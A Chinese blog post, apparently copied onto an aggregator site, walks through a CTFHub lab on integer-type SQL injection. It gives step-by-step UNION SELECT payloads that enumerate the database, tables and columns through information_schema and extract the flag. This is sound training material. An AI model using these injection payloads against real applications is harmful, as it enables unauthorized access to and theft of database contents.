当前位置:首页 » 《休闲阅读》 » 正文

CTFHUB_web_sql整数型注入_JYSNkai的博客

26 人参与  2022年01月02日 16:15  分类 : 《休闲阅读》  评论

点击全文阅读


 

手动解题步骤

1. 检查是否存在注入

and 1=1 #返回正确  
and 1=2 #返回错误

 

 存在

2. 猜字段数 得出字段数

1 order by 1
1 order by 2
1 order by 3

 

可以看出存在俩个字段

3. 爆数据库名

-1 union select user(),database()

## -1是为了前面部分查询无结果,从而显示后面union的查询结果

 得到数据库名称sqli

4. 爆表名

-1 union select 999,group_concat(table_name)from information_schema.tables where table_schema='sqli'

 得到表名 news,flag

5. 爆列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

 得到字段名flag

6. 获得flag

-1 union select 1,group_concat(flag) from sqli.flag

 

 


点击全文阅读


本文链接:http://zhangshiyu.com/post/32552.html

字段  返回  数据库  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • 无弹窗全文(裴清漪崔翊寒)不见神佛不见她全文畅享阅读
  • 在深渊里判你无赦:结局+番外免费品鉴+起始篇章(霍凛姜晚)阅读
  • 白知瑶楚晚舟小说(浮生千劫与君别楚晚舟)(白知瑶楚晚舟)全书+后续+结局在线阅读
  • 俞景川乔九笙到最后,只求一个灰飞烟灭续集起点章节+全书阅读(到最后,只求一个灰飞烟灭)书荒必看
  • 曾言爱恨唯有荒芜(温凝霜周执野)_曾言爱恨唯有荒芜温凝霜周执野
  • (书荒必看)浮生未歇梦已远小说TXT无套路阅读
  • 叶晚宁沈墨寒小说(追风赶月莫停留沈墨寒)章节目录+起点章节(叶晚宁沈墨寒)全篇清爽版在线
  • 被指偷走一切后我重回八零杀疯了(顾长风李秀芳陈建军),被指偷走一切后我重回八零杀疯了
  • 谢之珩傅明月小说(爱到最后烟消云散傅明月)小说***下载_章节前文+后续(谢之珩傅明月)
  • 云朝朝容临渊在线看_云朝朝容临渊在线看
  • 雪上春霜(温观意陆一然)全书浏览_雪上春霜全书浏览
  • 谁与你今夕白头(萧元燧虞桃夭)全书浏览_谁与你今夕白头全书浏览

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1